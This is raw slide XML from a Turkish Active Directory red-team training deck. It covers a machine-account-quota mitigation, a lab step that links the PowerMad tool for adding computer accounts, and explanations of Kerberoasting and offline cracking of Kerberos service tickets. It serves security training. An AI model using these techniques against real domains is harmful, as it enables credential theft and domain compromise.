            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>-DS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>MachineAccountQuota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güncellenmelidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Add workstations to domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ayarıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sadece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>belirli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gruplara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domaine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>makine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ekleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>verilmelidir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66122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C5DBB-5E1B-8F81-E4CC-7BC1FBBCC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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #9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77FA2-536A-58A2-99B7-71BA98D55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RDWS01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PowerMad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aracını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>indiriz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. (https://github.com/forestallio/ActiveDirectoryRedTeaming/tree/main/Powermad) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> yeni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bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ekleyiniz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96527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D8BF8-C8B1-5DFA-5C5B-89D1BA7BB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Roasting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7A802-69BC-7D50-5ECA-735D772913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76876" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>araya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>girme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kurbanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>trafiği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilebilirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>paketler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifreli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>alanlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>istemcinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>hesabının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>hesabının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirilebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>karmaşık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kırılma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olasılığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>düşüktür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Sadece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>versiyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sistemlerde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>basit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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bırakılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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262D0-91F5-08CD-8B08-BAD9E4486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075" y="2561876"/>
            <a:ext cx="5181600" cy="23835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54387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7F076-44C3-6C47-C843-40D5DE17C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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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DC7562-D2D4-3E52-4795-A2EFB9B183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97665"/>
            <a:ext cx="10515600" cy="32072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78443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43086-0F24-592C-F79A-622B9AC1B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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting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C0E87-2BB7-822F-C9C4-D90F1B774F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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servisler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edebilmektedirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bunun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>herhangi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yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kontrolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılmamasıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönetilen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servise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>alınan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> TGS-REP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>paketi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcısının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifrelenmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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D7999-1E9F-CE83-F9E9-5F035F402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2" y="2798858"/>
            <a:ext cx="5181600" cy="18524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569005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C1B7E-39FF-0FAA-0F47-7480A0250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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting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F4414-74AB-5974-42F9-614AEDB7FE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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirmiş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saldırgan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ederek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> offline brute-force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
